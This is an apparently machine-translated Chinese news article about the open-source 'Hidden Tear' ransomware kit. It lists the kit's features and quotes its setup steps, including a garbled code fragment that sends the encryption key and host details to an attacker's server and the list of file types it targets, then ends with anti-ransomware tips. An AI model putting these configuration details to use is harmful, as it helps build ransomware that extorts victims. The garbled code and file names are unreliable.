Script Kiddy现在可以使用此工具包创建自己的勒索软件
相关标签: # html# 服务器# 数据# 恶意软件# 支付
一位名叫乌特库·森的土耳其安全研究人员发布了开源代码共享网站GitHub上的一个功能齐全的勒索软件代码.
勒索软件被称为暗流,使用AES加密锁定文件,然后显示赎金消息警告,让用户支付。
目前无法检测到的勒索软件版本可以进行相应的修改和实施,因为它包含了网络罪犯可以从现代恶意软件中期待的所有功能。
森将他的勒索软件描述为“类似勒索软件的文件加密器样本,可针对特定目的进行修改。”这意味着即使是脚本小子现在也可以开发自己的勒索软件来威胁人们。
隐藏的眼泪;免费勒索软件包
“隐藏的眼泪”勒索软件包包括四个文件,即:
- 隐藏式泪液解密器
- 暗流
- Gitignore
- 好吧。医学博士
隐藏的催泪勒索软件能够:
- 使用AES算法对文件进行加密
- 向服务器发送加密密钥
- 使用带有加密密钥的解密程序对文件进行加密和解密
- 在桌面上创建包含给定消息的文本文件
- 小文件大小(12KB)
- 逃避所有标准反病毒程序的检测
如何设置您的自定义勒索软件使用隐藏的眼泪?
Sen还指定了使用细节,他说:
1.您需要有一个支持PHP或Python等脚本语言的web服务器。然后用你的URL更改下面提到的行。(为了避免窃听,最好使用HTTPS连接);
2.脚本应该将GET参数写入文本文件。正在SendPassword()函数中运行的发送进程:
字符串信息=计算机名+“-”+用户名+“+密码;
was fullUrl=目标URL+信息;
var conent=新系统。网WebClient()。下载字符串(完整URL);
3. 目标文件扩展名也可以更改。默认列表:
var validextenses=new[]{.txt“,.doc“,.docx“,.xls“,.xlsx“,.ppt“,.pptx“,.odt“,.jpg“,.png“,.csv”,.sql“,.mdb”,.sln“,.php“,.asp”,.aspx“,.html”,.xml“,.psd”};
为了教育目的
等待森有更多的话要说,听你可能会想.....真正地
对于整个“隐藏的眼泪”项目,有一个附加的法律警告说:
“虽然这可能对一些人有帮助,但也存在很大的风险。这种‘隐藏的眼泪’可能只用于教育目的“不要把它用作勒索工具!即使你是无辜的,你也可能会因为暗流眼泪而因妨碍司法而入狱。"
有人应该问他…;为什么煽动人们犯罪?可以想象这样的情况。”教育目的“因为在最近的袭击中,勒索软件很可能会突然出现。
参观沙箱测试“隐藏的眼泪”的视频演示,可以真实地了解它所能做的一切。
如何保护自己免受勒索软件的威胁?
两个月前,我们向你介绍了免费勒索软件解密和恶意软件删除工具包这可以帮助你处理各种各样的勒索软件,还可以帮助你解锁加密文件,而不必向网络骗子赔钱。
然而,有一些重要的步骤应该考虑保护自己免受勒索软件的威胁。
- 始终定期备份重要数据。
- 确保您在系统上运行了一套活跃的防病毒安全工具。
- 不要打开来自未知来源的电子邮件附件。
- 最重要的是,始终安全地浏览互联网。
为了保证你自己的安全,我们还有一篇关于如何保护您的计算机免受勒索软件恶意软件的攻击?
特别声明:以上内容(图片及文字)均为互联网收集或者用户上传发布,本站仅提供信息存储服务!如有侵权或有涉及法律问题请联系我们。
举报
